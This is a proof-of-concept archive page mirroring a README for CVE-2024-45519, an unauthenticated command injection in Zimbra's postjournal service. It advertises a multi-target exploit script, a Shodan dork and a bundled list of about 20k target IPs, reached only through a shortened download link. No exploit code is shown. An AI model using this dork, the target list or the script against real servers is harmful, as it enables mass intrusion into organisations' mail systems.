Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%

CVE-2024-45519 PoC — Zimbra Collaboration Server 安全漏洞

Source
Associated Vulnerability
Title:Zimbra Collaboration Server 安全漏洞 (CVE-2024-45519)
Description:The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands.
Description
CVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.
Readme
CVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.


[Downlaod link here](https://bit.ly/3Bjuics)

# Details:
what is Journalling?<br>
Journalling is a process which is used for email compliance or archiving purposes.<br>
`Insecure handling of email data` results in unauthenticated command execution in context of `zimbra` user.<br>
The vulnerability occures in certain condition if journalling is configured `which is not a default configuration`,<br>
as its obvious with the journalling process mostl likely its configured by orginizations.<br>

# About:
Process:<br>
While the rules are set for journalling emails, The income emails are processed by MTA (in zimbra case its Postfix)<br>
when it detects that an email matches the journal rules, then it sends a copy of the email to the PostJournal service<br>
and then the PostJournal captures the email data including header,body.............

A complete deep dive (zimbra.pdf) to undrestand the vulnerable code and bypasses of filters and how we can abuse it to acheive Command Injection
</p>
A python script (CVE-2024-45519.py) which trigger the vulnerability and execute user supplied command in context of the zimbra user
can also execute command on single and multiple targets(IP list) with multi-threading capability.<br>

Shodan Dork: http.favicon.hash:1624375939 <br>
20k Ips are included here (ips.txt)<br>
in time of writting 66k results in shodan.<br>


# Download: [here](https://bit.ly/3Bjuics)
File Snapshot

[4.0K] /data/pocs/4642ad7a2af14b949e7b9f97592338f466641a81 └── [1.5K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →